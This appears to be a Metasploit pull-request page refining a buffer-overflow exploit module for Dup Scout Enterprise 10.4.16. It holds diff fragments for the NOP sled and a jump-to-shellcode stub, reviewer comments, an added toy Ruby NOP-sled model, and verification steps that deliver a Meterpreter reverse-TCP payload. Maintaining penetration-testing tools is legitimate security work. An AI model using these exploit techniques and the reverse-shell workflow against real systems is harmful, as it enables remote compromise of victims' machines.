Updated Dup Scout Documentation and Module Based on Vuln Analysis #9478
buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'" | ||
buffer << "\x90" * 1560 | ||
buffer << nops[0,1560] |
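Review bot: the replacement line `buffer << nops[0,1560]` takes a prefix of a pre-generated NOP stream, so the sled can stop part-way through a multi-byte instruction; the truncated instruction would then be decoded together with the first bytes of whatever follows the sled, which is exactly the case a fixed-offset layout cannot tolerate. Ask the generator for the size actually needed, `buffer << make_nops(1560)`, so the sled ends on an instruction boundary and is built against the module's bad-character list. The removed `"\x90" * 1560` had a clean boundary but is only valid when 0x90 is not one of the bad characters.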
I would just call make_nops for the size we need in all these cases since slicing into the nop stream is not guaranteed to be safe.
Lol, we discussed this on Slack yesterday.
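The point raised in the review thread above, that a prefix slice of a NOP stream can end in the middle of an instruction while a sled generated for the exact size cannot, as an added example that is not part of this PR or of Metasploit. It models the stream with a constructed subset of x86 NOP encodings (the Intel multi-byte NOP forms) instead of Metasploit's own `make_nops` generator; `make_sled`, `decode_sled` and `slice_vs_exact` are illustrative names, not framework API.

```ruby
# Added example, not Metasploit code: a toy model of a multi-byte NOP sled
# showing why slicing a bigger stream can leave a dangling partial instruction
# at the end of the sled, where a pivot stub or payload follows.

# Constructed subset of x86 NOP-equivalent encodings (bytes => mnemonic),
# longest first. These are the Intel-recommended multi-byte NOP forms.
NOP_FORMS = {
  "\x0F\x1F\x40\x00".b => "nop dword [eax+0x0]", # 4 bytes
  "\x0F\x1F\x00".b     => "nop dword [eax]",     # 3 bytes
  "\x66\x90".b         => "xchg ax, ax",         # 2 bytes
  "\x90".b             => "nop",                 # 1 byte
}.freeze

# Build a sled of exactly `size` bytes. Multi-byte NOPs are laid down in a
# fixed 3/4-byte alternation and the remainder is filled with 1-byte NOPs,
# so the last instruction always ends exactly at `size`.
def make_sled(size)
  pattern = ["\x0F\x1F\x00".b, "\x0F\x1F\x40\x00".b]
  sled = "".b
  i = 0
  while sled.bytesize + pattern[i % 2].bytesize <= size
    sled << pattern[i % 2]
    i += 1
  end
  sled << "\x90".b * (size - sled.bytesize) # pad the tail with 1-byte NOPs
  sled
end

# Walk `bytes` as a sequence of known NOP forms.
# Returns [clean, mnemonics, dangling_bytes]; `clean` is false when the
# bytes end inside an instruction, i.e. the decoder would need bytes from
# whatever comes after the sled to finish the last instruction.
def decode_sled(bytes)
  insns = []
  pos = 0
  while pos < bytes.bytesize
    form, mnem = NOP_FORMS.find { |enc, _| bytes.byteslice(pos, enc.bytesize) == enc }
    return [false, insns, bytes.byteslice(pos..-1)] if form.nil?
    insns << mnem
    pos += form.bytesize
  end
  [true, insns, "".b]
end

# Compare the module's original approach (slice `need` bytes out of a
# `total`-byte stream) with generating a sled of exactly `need` bytes.
def slice_vs_exact(total, need)
  sliced = make_sled(total).byteslice(0, need)
  exact  = make_sled(need)
  sliced_clean, _, sliced_tail = decode_sled(sliced)
  exact_clean, _, _            = decode_sled(exact)
  {
    sliced_clean: sliced_clean,
    sliced_tail:  sliced_tail,
    exact_clean:  exact_clean,
    exact_size:   exact.bytesize,
  }
end

if __FILE__ == $PROGRAM_NAME
  r = slice_vs_exact(2048, 1560)
  puts "prefix slice (1560 of 2048 bytes) ends on a whole instruction: #{r[:sliced_clean]}"
  puts "  dangling bytes: #{r[:sliced_tail].unpack1('H*')}"
  puts "sled generated for exactly 1560 bytes ends on a whole instruction: #{r[:exact_clean]}"
end
```

With 2048 and 1560 the slice ends on the three dangling bytes `0f 1f 40`, the front of a four-byte NOP; at runtime the CPU would complete that instruction with the first byte of whatever follows the sled and skip it. The exact-size sled ends on a whole instruction. Metasploit's generator picks instructions randomly, so where a cut lands is a matter of luck, which is the reviewer's objection to `nops[0,1560]`.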
esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76] | ||
jmp = "\xFF\xE0" # JMP ESP | ||
jmp = "\xFF\xE0" # JMP EAX |
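Review bot: the comment fix on the last line is right and worth keeping: `FF E0` encodes `jmp eax`, whereas `jmp esp` would be `FF E4`, so the old `# JMP ESP` comment misdescribed the stub. Paired with `8D 44 24 4C`, which is `lea eax, [esp+0x4c]` (0x4c = 76, matching the `[ESP+76]` comment), the two instructions transfer control to ESP+76. Consider a short comment on the `esp` line saying that the stub lands 76 bytes above ESP, so the figure can be checked against the buffer layout, and a name other than `esp` for a variable that holds an LEA encoding rather than a stack pointer.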
Nice catch!
Update the documentation based on analysis of the vulnerability. Slight modifications to the exploit module as well to reduce the size of the generated file and reduce bad characters.
I fixed the changes here @wvu-r7.
I need to update the headings for this documentation too...
LGTM, thanks @jrobles-r7
Release Notes

The exploits/windows/fileformat/dupscout_xml module no longer considers as many characters unusable, so there are more options for generating payloads. The module has also been streamlined to generate smaller payloads.
This PR updates the Dup Scout Enterprise v10.4.16 buffer overflow exploit module.
Verification
```
./msfconsole
use exploit/windows/fileformat/dupscout_xml
set payload windows/meterpreter/reverse_tcp
set lhost <lhost>
run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <lhost>
run
```